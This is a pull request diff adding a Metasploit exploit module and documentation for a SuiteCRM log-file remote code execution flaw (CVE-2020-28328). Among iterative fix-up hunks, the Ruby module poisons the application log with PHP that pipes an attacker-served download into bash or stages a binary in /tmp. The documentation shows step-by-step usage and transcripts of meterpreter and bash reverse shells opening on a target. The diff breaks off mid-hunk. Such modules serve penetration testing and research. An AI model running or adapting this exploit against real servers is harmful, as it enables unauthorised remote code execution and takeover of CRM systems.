### PR TITLE
Added module and documentation for SuiteCRM Log File RCE CVE-2020-28328

### DIFF
--- a/documentation/modules/exploit/linux/http/suitecrm_log_file_rce.md
+++ b/documentation/modules/exploit/linux/http/suitecrm_log_file_rce.md
@@ -1,0 +1,170 @@
+## Vulnerable Application
+
+SuiteCRM versions 7.11.18 and below. https://docs.suitecrm.com/admin/releases/7.11.x/#_7_11_18  
+
+### Installation
+Installation: https://docs.suitecrm.com/admin/installation-guide/downloading-installing/  
+
+The fastest way to stand up a quick test instance is with docker. Bitnami hosts docker images and `docker-compose.yml` files.
+
+Docker installation: https://docs.docker.com/get-docker/
+
+```
+curl -sSL https://raw.githubusercontent.com/bitnami/bitnami-docker-suitecrm/master/docker-compose.yml > docker-compose.yml
+docker-compose up -d
+```
+
+You'll just want to edit the docker-compose file to pull the 7.11.18 release before you run `docker-compose up -d`. Example `docker-compose.yml` below:
+
+```
+  suitecrm:
+    image: docker.io/bitnami/suitecrm:7.11.18
+```
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/suitecrm_log_file_rce`
+4. Do: `set USER [username]`
+5. Do: `set PASS [password]`
+6. Do: `set RHOSTS [IP]`
+7. Do: `set SRVPORT [IP]`
+8. Do: `set LHOST [IP] `
+9. Do: `exploit`
+10. You should get a shell.
+
+## Options
+### USER
+Username of a user with administrator access to the SuiteCRM instance
+
+### PASS
+Password of the user with administrator access to the SuiteCRM instance
+
+### TARGETURI
+The base path to SuiteCRM. The default is `/`
+
+### RESTORECONF
+Restore the system log file settings to the default value of `suitecrm.log`. Default value is `true`
+
+### LASTNAME
+Last name you'd like to set the admin user back to after running the exploit. Default is `admin`.
+
+### WRITABLEDIR
+Any writable directory for paylod to be written. Only used for targets `0` ( `x64 meterpreter` ) and `2` ( `x86 meterpreter` )
+
+## Targets
+Default is `0` with a payload of `linux/x64/meterpreter_reverse_tcp`
+```
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Linux (x64)
+   1   Linux (cmd)
+```
+Currently, this supports
+* `linux/x64/meterpreter_reverse_tcp`
+* `cmd/unix/bash_reverse_tcp`
+
+There is some encoding/escaping on the php poisoning into the log file, so php code is limited. I would also presume an `x86` meterpreter would run fine, but I haven't tested it. I did test a `cmd/unix/bash_reverse_udp` and it worked fine. I would presume most `cmd` payloads will work contingent on the required tools being available on the victim machine.
+
+### Artifacts/IOC's
+Target 0 is going to leave a random, 8 character alphanumeric PHP file such as this
+```
+ryl2bLse.pHp
+```
+in the webroot and it will leave a random alphanumeric 8 character file in `WRITABLEDIR` (`/tmp` by default) similar to this
+```
+uG0QjRbK
+```
+Operators: keep an eye out for the last couple of lines of output
+```
+[!] This exploit may require manual cleanup of 'eTHsm71W.pHp' on the target
+[!] This exploit may require manual cleanup of '/tmp/54N6HA1E' on the target
+```
+
+## Scenarios
+### SuiteCRM 7.11.18 Check + Target 0 (linux x64 meterpreter)
+```
+msf6 > use exploit/linux/http/suitecrm_log_file_rce
+[*] Using configured payload linux/x64/meterpreter_reverse_tcp
+msf6 exploit(linux/http/suitecrm_log_file_rce) > set RHOSTS 192.168.122.29
+RHOSTS => 192.168.122.29
+msf6 exploit(linux/http/suitecrm_log_file_rce) > set USER admin
+USER => admin
+msf6 exploit(linux/http/suitecrm_log_file_rce) > set PASS admin
+PASS => admin
+msf6 exploit(linux/http/suitecrm_log_file_rce) > set SRVHOST 192.168.122.125
+SRVHOST => 192.168.122.125
+msf6 exploit(linux/http/suitecrm_log_file_rce) > set LHOST 192.168.122.125
+LHOST => 192.168.122.125
+msf6 exploit(linux/http/suitecrm_log_file_rce) > check
+
+[*] Authenticating as admin
+[+] Authenticated as: admin
+[+] admin has administrative rights.
+[+] SuiteCRM Version 7.11.18
+[*] 192.168.122.29:80 - The target appears to be vulnerable.
+msf6 exploit(linux/http/suitecrm_log_file_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.122.125:4444 
+[*] Using URL: http://192.168.122.125:8080/NzzKmKY
+[*] Authenticating as admin
+[+] Authenticated as: admin
+[+] admin has administrative rights.
+[*] Modifying systems setting file
+[*] Poisoning log file
+[*] Executing php code in log file: fxg8pi1C.pHp
+[+] 192.168.122.29:80 - Payload sent!
+[*] Meterpreter session 1 opened (192.168.122.125:4444 -> 192.168.122.29:43346) at 2021-05-21 22:52:15 -0500
+[*] Restoring log file to default configuration
+[*] Server stopped.
+[!] This exploit may require manual cleanup of 'fxg8pi1C.pHp' on the target
+[!] This exploit may require manual cleanup of '/tmp/9yCGovF5' on the target
+
+meterpreter > getuid
+Server username: daemon @ bb77d61a4df1 (uid=1, gid=1, euid=1, egid=1)
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 172.21.0.3 - Meterpreter session 1 closed.  Reason: User exit
+```
+### SuiteCRM 7.11.18 Check + Target 1 (Unix bash reverse TCP shell)
+This was run immediately after the previous scenario. Initialization is exactly the same.
+```
+msf6 exploit(linux/http/suitecrm_log_file_rce) > sessions -i
+
+Active sessions
+===============
+
+No active sessions.
+
+msf6 exploit(linux/http/suitecrm_log_file_rce) > set target 1
+target => 1
+msf6 exploit(linux/http/suitecrm_log_file_rce) > run
+
+[*] Started reverse TCP handler on 192.168.122.125:4444 
+[*] Using URL: http://192.168.122.125:8080/Kle8QoPV
+[*] Authenticating as admin
+[+] Authenticated as: admin
+[+] admin has administrative rights.
+[*] Modifying systems setting file
+[*] Poisoning log file
+[*] Executing php code in log file: 1cOyYGE3.pHp
+[+] 192.168.122.29:80 - Payload sent!
+[*] Command shell session 2 opened (192.168.122.125:4444 -> 192.168.122.29:43366) at 2021-05-21 22:53:03 -0500
+[*] Restoring log file to default configuration
+[*] Server stopped.
+[!] This exploit may require manual cleanup of '1cOyYGE3.pHp' on the target
+
+id
+uid=1(daemon) gid=1(daemon) groups=1(daemon)
+whoami
+daemon
+exit
+[*] 192.168.122.29 - Command shell session 2 closed.
+
+```
+

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = GoodRanking
 

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -233,7 +233,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def poison_log_file
-    action = 'Poision log file'
+    action = 'Poison log file'
     if target.arch.first == 'cmd'
       command_injection = "<?php `curl #{@download_url} | bash`; ?>"
     else

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -139,11 +139,15 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
+    return false unless initial_req && initial_req.code == 200
+
+    initial_cookie = initial_req.get_cookies
+
     login = send_request_cgi(
       {
         'method' => 'POST',
         'uri' => normalize_uri(target_uri, 'index.php'),
-        'cookie' => initial_req.get_cookies,
+        'cookie' => initial_cookie,
         'vars_post' => {
           'module' => 'Users',
           'action' => 'Authenticate',

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -85,7 +85,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    authenticate
+    return Exploit::CheckCode::Unknown unless authenticate
+
     version_check = send_request_cgi(
       {
         'method' => 'GET',
@@ -145,6 +146,8 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
+    return false unless login && login.code == 302
+
     @cookie = login.get_cookies
 
     res = send_request_cgi(
@@ -174,10 +177,11 @@ class MetasploitModule < Msf::Exploit::Remote
         print_good("#{datastore['USER']} has administrative rights.")
         @is_admin = true
       end
+      return true
     else
-      fail_with(Failure::NoAccess, 'Incorrect username or password.')
+      print_error("Failed to authenticate as: #{datastore['USER']}")
+      return false
     end
-    false
   end
 
   def post_log_file(data)

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', 'true']),
         OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),
         OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])
-      ], self.class
+      ]
     )
   end
 

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -85,8 +85,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    @authenticated = false
-    return Exploit::CheckCode::Unknown unless authenticate
+    authenticate unless @authenticated
+    return Exploit::CheckCode::Unknown unless @authenticated
 
     version_check_request = send_request_cgi(
       {

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -296,7 +296,7 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res.code == 301
       print_error("Failed - #{action}")
       if datastore['RESTORECONF']
-        print_status('Attempting to restore configration')
+        print_status('Attempting to restore configuration')
         restore_request = restore
         print_error('Failed to restore confiugration') unless restore_request
       end

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -270,7 +270,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def execute_php
     print_status("Executing php code in log file: #{@php_fname}")
-    res = send_request_raw(
+    res = send_request_cgi(
       {
         'uri' => normalize_uri(target_uri, @php_fname),
         'cookie' => @cookie

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::CmdStager
   include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -36,7 +37,6 @@ class MetasploitModule < Msf::Exploit::Remote
             ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit
             ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit
           ],
-        'Payload' => {},
         'Platform' => %w[linux unix],
         'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],
         'Targets' =>
@@ -85,13 +85,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    @authenticated = false
     return Exploit::CheckCode::Unknown unless authenticate
 
     version_check_request = send_request_cgi(
       {
         'method' => 'GET',
         'uri' => normalize_uri(target_uri.path, 'index.php'),
-        'cookie' => @cookie,
+        'keep_cookies' => true,
         'vars_get' => {
           'module' => 'Home',
           'action' => 'About'
@@ -132,6 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
       {
         'method' => 'GET',
         'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
         'vars_get' => {
           'module' => 'Users',
           'action' => 'Login'
@@ -141,13 +143,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return false unless initial_req && initial_req.code == 200
 
-    initial_cookie = initial_req.get_cookies
-
     login = send_request_cgi(
       {
         'method' => 'POST',
         'uri' => normalize_uri(target_uri, 'index.php'),
-        'cookie' => initial_cookie,
+        'keep_cookies' => true,
         'vars_post' => {
           'module' => 'Users',
           'action' => 'Authenticate',
@@ -162,13 +162,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return false unless login && login.code == 302
 
-    @cookie = login.get_cookies
-
     res = send_request_cgi(
       {
         'method' => 'GET',
         'uri' => normalize_uri(target_uri, 'index.php'),
-        'cookie' => @cookie,
+        'keep_cookies' => true,
         'vars_get' => {
           'module' => 'Administration',
           'action' => 'index'
@@ -191,6 +189,7 @@ class MetasploitModule < Msf::Exploit::Remote
         print_good("#{datastore['USER']} has administrative rights.")
         @is_admin = true
       end
+      @authenticated = true
       return true
     else
       print_error("Failed to authenticate as: #{datastore['USER']}")
@@ -204,7 +203,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'method' => 'POST',
         'uri' => normalize_uri(target_uri, 'index.php'),
         'ctype' => "multipart/form-data; boundary=#{data.bound}",
-        'cookie' => @cookie,
+        'keep_cookies' => true,
         'headers' => {
           'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView"
         },
@@ -306,7 +305,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       {
         'uri' => normalize_uri(target_uri, @php_fname),
-        'cookie' => @cookie
+        'keep_cookies' => true
       }
     )
     fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404
@@ -335,7 +334,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     start_http_server
-    fail_with(Failure::NoAccess, datastore['USER'].to_s) unless authenticate
+    authenticate unless @authenticated
+    fail_with(Failure::NoAccess, datastore['USER'].to_s) unless @authenticated
     fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin
     modify_system_settings_file
     poison_log_file

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -298,7 +298,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if datastore['RESTORECONF']
         print_status('Attempting to restore configuration')
         restore_request = restore
-        print_error('Failed to restore confiugration') unless restore_request
+        print_error('Failed to restore configuration') unless restore_request
       end
       fail_with(Failure::UnexpectedReply, 'Exiting')
     end

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote
       about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About"
       return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.")
     end
-    
+
     current_version = Rex::Version.new(version)
 
     return Exploit::CheckCode::Appears("SuiteCRM Version #{version}") if current_version < fixed_version

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -295,13 +295,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     unless res.code == 301
       print_error("Failed - #{action}")
-      if datastore['RESTORECONF']
-        print_status('Attempting to restore configuration')
-        restore_request = restore
-        print_error('Failed to restore configuration') unless restore_request
-      end
-      fail_with(Failure::UnexpectedReply, 'Exiting')
+      fail_with(Failure::UnexpectedReply, "Failed - #{action}")
     end
+
     print_good("Succeeded - #{action}")
   end
 
@@ -344,6 +340,7 @@ class MetasploitModule < Msf::Exploit::Remote
     modify_system_settings_file
     poison_log_file
     execute_php
+  ensure
     restore if datastore['RESTORECONF']
   end
 end

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -176,7 +176,6 @@ class MetasploitModule < Msf::Exploit::Remote
         print_good("#{datastore['USER']} has administrative rights.")
         @is_admin = true
       end
-      true
     else
       fail_with(Failure::NoAccess, 'Incorrect username or password.')
     end

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -1,0 +1,319 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::CmdStager
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SuiteCRM Log File Remote Code Execution',
+        'Description' => %q{
+          This module exploits an input validation error on the log file extension parameter. It does
+          not properly validate upper/lower case characters. Once this occurs, the application log file
+          will be treated as a php file. The log file can then be populated with php code by changing the
+          username of a valid user, as this info is logged. The php code in the file can then be executed
+          by sending an HTTP request to the log file. A similar issue was reported by the same researcher
+          where a blank file extension could be supplied and the extension could be provided in the file
+          name. This exploit will work on those versions as well, and those references are included.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'M. Cory Billington' # @_th3y
+          ],
+        'References' =>
+          [
+            ['CVE', '2020-28328'], # First CVE
+            ['EDB', '49001'], # Previous exploit, this module will cover those versions too. Almost identical issue.
+            ['URL', 'https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/'], # First exploit
+            ['URL', 'https://theyhack.me/SuiteCRM-RCE-2/'] # This exploit
+          ],
+        'Payload' => {},
+        'Platform' => %w[linux unix],
+        'Arch' => %w[ARCH_X64 ARCH_CMD ARCH_X86],
+        'Targets' =>
+        [
+          [
+            'Linux (x64)', {
+              'Arch' => ARCH_X64,
+              'Platform' => 'linux',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Linux (cmd)', {
+              'Arch' => ARCH_CMD,
+              'Platform' => 'unix',
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ]
+        ],
+        'Notes' =>
+        {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'Privileged' => true,
+        'DisclosureDate' => '2021-04-28',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),
+        OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),
+        OptString.new('PASS', [true, 'Password for administrator', 'admin']),
+        OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', 'true']),
+        OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),
+        OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])
+      ], self.class
+    )
+  end
+
+  def check
+    authenticate
+    version_check = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'cookie' => @cookie,
+        'vars_get' => {
+          'module' => 'Home',
+          'action' => 'About'
+        }
+      }
+    )
+
+    unless version_check
+      vprint_error("#{peer} - Connection timed out")
+      Exploit::CheckCode::Unknown
+    end
+
+    version = version_check.body[/Version 7.11.\d{1,2}/]
+    version_number = Integer(version.split('.').last)
+
+    if version.nil? || version.empty?
+      vprint_error('Could not determine version.')
+      about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About"
+      print_status("Check #{about_url} to confirm version.")
+      Exploit::CheckCode::Unknown
+    end
+
+    print_status("SuiteCRM Version #{version}")
+
+    if version_number < 19
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def authenticate
+    print_status("Authenticating as #{datastore['USER']}")
+    initial_req = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'vars_get' => {
+          'module' => 'Users',
+          'action' => 'Login'
+        }
+      }
+    )
+
+    login = send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'cookie' => initial_req.get_cookies,
+        'vars_post' => {
+          'module' => 'Users',
+          'action' => 'Authenticate',
+          'return_module' => 'Users',
+          'return_action' => 'Login',
+          'user_name' => datastore['USER'],
+          'username_password' => datastore['PASS'],
+          'Login' => 'Log In'
+        }
+      }
+    )
+
+    @cookie = login.get_cookies
+
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'cookie' => @cookie,
+        'vars_get' => {
+          'module' => 'Administration',
+          'action' => 'index'
+        }
+      }
+    )
+
+    auth_succeeded?(res)
+  end
+
+  def auth_succeeded?(res)
+    fail_with(Failure::NoAccess, 'No Response.') unless res
+
+    if res.code == 200
+      print_good("Authenticated as: #{datastore['USER']}")
+      if res.body.include?('Unauthorized access to administration.')
+        print_warning("#{datastore['USER']} does not have administrative rights! Exploit will fail.")
+        @is_admin = false
+      else
+        print_good("#{datastore['USER']} has administrative rights.")
+        @is_admin = true
+      end
+      true
+    else
+      fail_with(Failure::NoAccess, 'Incorrect username or password.')
+    end
+    false
+  end
+
+  def post_log_file(data)
+    send_request_cgi(
+      {
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'ctype' => "multipart/form-data; boundary=#{data.bound}",
+        'cookie' => @cookie,
+        'headers' => {
+          'Referer' => "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Configurator&action=EditView"
+        },
+        'data' => data.to_s
+      }
+    )
+  end
+
+  def modify_system_settings_file
+    filename = rand_text_alphanumeric(8).to_s
+    extension = '.pHp'
+    @php_fname = filename + extension
+    print_status('Modifying systems setting file')
+
+    data = Rex::MIME::Message.new
+    data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
+    data.add_part('Configurator', nil, nil, 'form-data; name="module"')
+    data.add_part(filename.to_s, nil, nil, 'form-data; name="logger_file_name"')
+    data.add_part(extension.to_s, nil, nil, 'form-data; name="logger_file_ext"')
+    data.add_part('info', nil, nil, 'form-data; name="logger_level"')
+    data.add_part('Save', nil, nil, 'form-data; name="save"')
+
+    post_log_file(data)
+  end
+
+  def poison_log_file
+    if target.arch.first == 'cmd'
+      command_injection = "<?php `curl #{@download_url} | bash`; ?>"
+    else
+      @meterpreter_fname = "#{datastore['WRITABLEDIR']}/#{rand_text_alphanumeric(8)}"
+      command_injection = %(
+        <?php `curl #{@download_url} -o #{@meterpreter_fname};
+        /bin/chmod 700 #{@meterpreter_fname};
+        /bin/sh -c #{@meterpreter_fname};`; ?>
+      )
+    end
+
+    print_status('Poisoning log file')
+
+    data = Rex::MIME::Message.new
+    data.add_part('Users', nil, nil, 'form-data; name="module"')
+    data.add_part('1', nil, nil, 'form-data; name="record"')
+    data.add_part('Save', nil, nil, 'form-data; name="action"')
+    data.add_part('EditView', nil, nil, 'form-data; name="page"')
+    data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
+    data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
+    data.add_part(command_injection, nil, nil, 'form-data; name="last_name"')
+
+    post_log_file(data)
+  end
+
+  def restore
+    if datastore['RESTORECONF']
+      print_status('Restoring log file to default configuration')
+
+      data = Rex::MIME::Message.new
+      data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
+      data.add_part('Configurator', nil, nil, 'form-data; name="module"')
+      data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"')
+      data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"')
+      data.add_part('fatal', nil, nil, 'form-data; name="logger_level"')
+      data.add_part('Save', nil, nil, 'form-data; name="save"')
+
+      post_log_file(data)
+    end
+
+    data = Rex::MIME::Message.new
+    data.add_part('Users', nil, nil, 'form-data; name="module"')
+    data.add_part('1', nil, nil, 'form-data; name="record"')
+    data.add_part('Save', nil, nil, 'form-data; name="action"')
+    data.add_part('EditView', nil, nil, 'form-data; name="page"')
+    data.add_part('DetailView', nil, nil, 'form-data; name="return_action"')
+    data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
+    data.add_part(datastore['LASTNAME'], nil, nil, 'form-data; name="last_name"')
+
+    post_log_file(data)
+  end
+
+  def execute_php
+    print_status("Executing php code in log file: #{@php_fname}")
+    res = send_request_raw(
+      {
+        'uri' => normalize_uri(target_uri, @php_fname),
+        'cookie' => @cookie
+      }
+    )
+    fail_with(Failure::NotFound, "#{peer} - Not found: #{@php_fname}") if res && res.code == 404
+    register_files_for_cleanup(@php_fname)
+    register_files_for_cleanup(@meterpreter_fname) unless @meterpreter_fname.nil? || @meterpreter_fname.empty?
+  end
+
+  def on_request_uri(cli, _request)
+    send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
+    print_good("#{peer} - Payload sent!")
+  end
+
+  def start_http_server
+    start_service(
+      {
+        'Uri' => {
+          'Proc' => proc do |cli, req|
+            on_request_uri(cli, req)
+          end,
+          'Path' => resource_uri
+        }
+      }
+    )
+    @download_url = get_uri
+  end
+
+  def exploit
+    start_http_server
+    authenticate
+    fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin
+    modify_system_settings_file
+    poison_log_file
+    execute_php
+    restore
+  end
+end

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -176,7 +176,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def auth_succeeded?(res)
-    fail_with(Failure::NoAccess, 'No Response.') unless res
+    return false unless res
 
     if res.code == 200
       print_good("Authenticated as: #{datastore['USER']}")
@@ -335,7 +335,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     start_http_server
-    authenticate
+    fail_with(Failure::NoAccess, datastore['USER'].to_s) unless authenticate
     fail_with(Failure::NoAccess, "#{datastore['USER']} does not have administrative rights!") unless @is_admin
     modify_system_settings_file
     poison_log_file

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('TARGETURI', [true, 'The base path to SuiteCRM', '/']),
         OptString.new('USER', [true, 'Username of user with administrative rights', 'admin']),
         OptString.new('PASS', [true, 'Password for administrator', 'admin']),
-        OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', 'true']),
+        OptBool.new('RESTORECONF', [false, 'Restore the configuration file to default after exploit runs', true]),
         OptString.new('WRITABLEDIR', [false, 'Writable directory to stage meterpreter', '/tmp']),
         OptString.new('LASTNAME', [false, 'Admin user last name to clean up profile', 'admin'])
       ]
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     return Exploit::CheckCode::Unknown unless authenticate
 
-    version_check = send_request_cgi(
+    version_check_request = send_request_cgi(
       {
         'method' => 'GET',
         'uri' => normalize_uri(target_uri.path, 'index.php'),
@@ -99,21 +99,31 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
 
-    return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check
+    return Exploit::CheckCode::Unknown("#{peer} - Connection timed out") unless version_check_request
 
-    fixed_version = Rex::Version.new('7.11.19')
-    version = version_check.body[/Version 7.11.\d{1,2}/].partition(' ').last
+    version_match = version_check_request.body[/
+      Version
+      \s
+      \d{1} # Major revision
+      \.
+      \d{1,2} # Minor revision
+      \.
+      \d{1,2} # Bug fix release
+      /x]
+
+    version = version_match.partition(' ').last
 
     if version.nil? || version.empty?
       about_url = "#{full_uri}#{normalize_uri(target_uri, 'index.php')}?module=Home&action=About"
       return Exploit::CheckCode::Unknown("Check #{about_url} to confirm version.")
     end
 
+    patched_version = Rex::Version.new('7.11.18')
     current_version = Rex::Version.new(version)
 
-    return Exploit::CheckCode::Appears("SuiteCRM Version #{version}") if current_version < fixed_version
+    return Exploit::CheckCode::Appears("SuiteCRM #{version}") if current_version <= patched_version
 
-    Exploit::CheckCode::Safe("SuiteCRM Version #{version}")
+    Exploit::CheckCode::Safe("SuiteCRM #{version}")
   end
 
   def authenticate
@@ -203,7 +213,8 @@ class MetasploitModule < Msf::Exploit::Remote
     filename = rand_text_alphanumeric(8).to_s
     extension = '.pHp'
     @php_fname = filename + extension
-    print_status('Modifying systems setting file')
+    action = 'Modify system settings file'
+    print_status("Trying - #{action}")
 
     data = Rex::MIME::Message.new
     data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
@@ -213,10 +224,12 @@ class MetasploitModule < Msf::Exploit::Remote
     data.add_part('info', nil, nil, 'form-data; name="logger_level"')
     data.add_part('Save', nil, nil, 'form-data; name="save"')
 
-    post_log_file(data)
+    res = post_log_file(data)
+    check_logfile_request(res, action)
   end
 
   def poison_log_file
+    action = 'Poision log file'
     if target.arch.first == 'cmd'
       command_injection = "<?php `curl #{@download_url} | bash`; ?>"
     else
@@ -228,7 +241,7 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     end
 
-    print_status('Poisoning log file')
+    print_status("Trying - #{action}")
 
     data = Rex::MIME::Message.new
     data.add_part('Users', nil, nil, 'form-data; name="module"')
@@ -239,23 +252,23 @@ class MetasploitModule < Msf::Exploit::Remote
     data.add_part(datastore['USER'], nil, nil, 'form-data; name="user_name"')
     data.add_part(command_injection, nil, nil, 'form-data; name="last_name"')
 
-    post_log_file(data)
+    res = post_log_file(data)
+    check_logfile_request(res, action)
   end
 
   def restore
-    if datastore['RESTORECONF']
-      print_status('Restoring log file to default configuration')
+    action = 'Restore logging to default configuration'
+    print_status("Trying - #{action}")
 
-      data = Rex::MIME::Message.new
-      data.add_part('SaveConfig', nil, nil, 'form-data; name="action"')
-      data.add_part('Configurator', nil, nil, 'form-data; name="module"')
-      data.add_part('suitecrm', nil, nil, 'form-data; name="logger_file_name"')
-      data.add_part('.log', nil, nil, 'form-data; name="logger_file_ext"')
